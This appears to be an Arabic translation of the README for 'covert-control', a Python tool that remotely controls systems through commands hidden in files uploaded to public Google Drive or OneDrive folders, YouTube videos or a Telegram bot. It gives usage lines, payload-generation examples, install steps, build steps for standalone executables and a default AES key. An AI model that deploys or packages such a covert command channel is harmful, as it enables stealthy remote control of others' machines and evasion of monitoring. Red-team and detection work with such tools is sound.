
Google Drive و OneDrive و Youtube كقنوات خفية - التحكم في الأنظمة عن بُعد عن طريق رفع الملفات إلى Google Drive أو OneDrive أو Youtube أو Telegram
التحكم في الأنظمة عن بُعد عن طريق رفع الملفات إلى Google Drive أو OneDrive أو Youtube أو Telegram باستخدام Python لإنشاء الملفات والمستمعات. يتيح إنشاء ملفات نصية أو صور أو صوت أو فيديو، مع الأوامر بنص واضح أو مشفرة باستخدام AES.
covert-googledrive.py - التحكم في الأنظمة عن طريق رفع الملفات إلى مجلد عام في Google Drive.covert-onedrive.py - التحكم في الأنظمة عن طريق رفع الملفات إلى مجلد عام في OneDrive.covert-youtube.py - التحكم في الأنظمة عن طريق رفع فيديوهات إلى Youtube (مُحدّث من covert-tube).covert-telegram.py - التحكم في الأنظمة باستخدام بوت Telegram.يمكنك العثور على ملفات مثال في مجلد test_files أو إنشاء ملفات جديدة باستخدام generate_file.py:
python3 generate_file.py -t TYPE [-o OUTPUTFILE] [-c COMMAND] [-e]
-t (--type) [مطلوب]: أنواع الملفات: "text" أو "image" أو "audio" أو "video".-o (--outputfile) [اختياري]: ملف الإخراج.-c (--command) [اختياري]: الأمر المراد تنفيذه.-e (--encrypted) [اختياري]: أضف هذه العلامة لتشفير الأمر باستخدام AES.أمثلة:
python3 generate_file.py -t text -c "whoami" -o text.txt
python3 generate_file.py -t text -c "whoami" -o text_encrypted.txt -e
python3 generate_file.py -t audio -c "whoami" -o audio.wav
python3 generate_file.py -t audio -c "whoami" -o audio_encrypted.wav -e
python3 generate_file.py -t image -c "whoami" -o image.png
python3 generate_file.py -t image -c "whoami" -o image_encrypted.png -e
python3 generate_file.py -t video -c "whoami" -o video.avi
python3 generate_file.py -t video -c "whoami" -o video_encrypted.avi -e
قيم الإعدادات العامة:
data_type (اختياري. القيمة الافتراضية: "text"):
قيم الإعدادات الخاصة:
covert-googledrive.py).covert-onedrive.py).covert-youtube.py).covert-youtube.py).covert-telegram.py).يتيح تنفيذ الأوامر عن طريق رفع ملفات نصية أو صور أو صوت أو فيديو، غير مشفرة أو مشفرة باستخدام AES. الوسيط الإدخالي الاختياري هو رابط المجلد العام، ويمكن أيضًا إعداده في config.py:
python3 covert-googledrive.py [FOLDER_URL]
سيتحقق المستمع من مجلد Google Drive كل 300 ثانية بشكل افتراضي (يمكن تحديثه في config.py). في هذه الحالة، يتم رفع فيديو، "video.avi"، مع الأمر المضمن في رمز QR الخاص بالفيديو:

بعد العثور على ملف جديد مرفوع إلى المجلد، يتم تنزيله ومعالجته وتنفيذ الأوامر:

يتيح تنفيذ الأوامر عن طريق رفع ملفات نصية أو صور أو صوت أو فيديو، غير مشفرة أو مشفرة باستخدام AES. الوسيط الإدخالي الاختياري هو رابط المجلد العام، ويمكن أيضًا إعداده في config.py:
python3 covert-onedrive.py [FOLDER_URL]
سيتحقق المستمع من مجلد OneDrive كل 300 ثانية بشكل افتراضي (يمكن تحديثه في config.py). في هذه الحالة، يتم رفع ملف صوتي، "audio_encrypted.wav"، مع الأمر المشفر باستخدام AES:

بعد العثور على ملف جديد مرفوع إلى المجلد، يتم تنزيله ومعالجته وتنفيذ الأوامر:

ملاحظة: هذا سيعمل فقط إذا لم تقم بحذف أي ملف في المجلد، وإذا قمت بذلك يجب إنشاء مجلد جديد. يمكن تطبيقه ليعمل حتى بعد حذف الملفات، ولكن سيكون من الضروري إنشاء العديد من الطلبات وسيكون أقل خفاءً.
يتيح تنفيذ الأوامر عن طريق رفع فيديوهات، غير مشفرة أو مشفرة باستخدام AES. الوسيطات الإدخالية الاختيارية هي معرف قناة Youtube للمراقبة ومفتاح API، ويمكن أيضًا إعدادهما في config.py:
python3 covert-youtube.py [CHANNEL_ID] [API_KEY]
سيتحقق المستمع من قناة Youtube كل 300 ثانية بشكل افتراضي (يمكن تحديثه في config.py). أولاً يتم رفع الفيديو:

بعد العثور على فيديو جديد في القناة، يتم تنزيله ومعالجته وتنفيذ الأوامر:

التحكم في الأنظمة عن بُعد باستخدام بوت Telegram. هذا الخيار لا يتيح رفع الملفات، ولكن يمكن إرسال الأوامر بنص واضح ("/cmd") أو مشفرة باستخدام AES ("/encrypted"). الوسيط الإدخالي الاختياري الأول هو رمز البوت، ويمكن أيضًا إعداده في config.py؛ والثاني يُستخدم لتكوين مستخدم Telegram واحد يمكنه إرسال الأوامر إلى البوت (بدون "@"):
python3 covert-telegram.py [BOT_TOKEN] [TELEGRAM_USER]
سيتحقق المستمع من الأوامر في الدردشة ويعرض المخرجات:
/cmd CLEARTEXT_COMMAND
/encrypted AES_ENCRYPTED_COMMAND

sudo apt install libzbar0
pip install bs4 Pillow opencv-python pyqrcode pypng pyzbar youtube_dl pytesseract python-telegram-bot requests argparse pycryptodome
git clone https://github.com/ricardojoserf/covert-control && cd covert-control/
pyinstaller --onefile covert-googledrive.py
pyinstaller --onefile covert-onedrive.py
pyinstaller --onefile covert-telegram.py
pyinstaller --onefile covert-youtube.py
rm -rf build
rm *spec
ls dist/
| data_type | نوع الملف | مشفر؟ | صالح لـ | الامتداد |
|---|
| text | ملف نصي | لا | Google Drive, OneDrive | .txt |
| text_encrypted | ملف نصي | نعم | Google Drive, OneDrive | .txt |
| image | صورة | لا | Google Drive, OneDrive | .png |
| image_encrypted | صورة | نعم | Google Drive, OneDrive | .png |
| audio | صوت | لا | Google Drive, OneDrive | .wav |
| audio_encrypted | صوت | نعم | Google Drive, OneDrive | .wav |
| video | فيديو | لا | Google Drive, OneDrive, Youtube | .avi |
| video_encrypted | فيديو | نعم | Google Drive, OneDrive, Youtube | .avi |
delay_seconds (اختياري. القيمة الافتراضية: 300): الثواني بين فحص الملفات الجديدة المرفوعة إلى مجلد Google Drive أو OneDrive أو الفيديوهات الجديدة في قناة Youtube.
aes_key (اختياري. القيمة الافتراضية: "covert-control21"): مفتاح التشفير باستخدام AES.
debug (اختياري. القيمة الافتراضية: True): طباعة الرسائل والطوابع الزمنية في المستمع أم لا.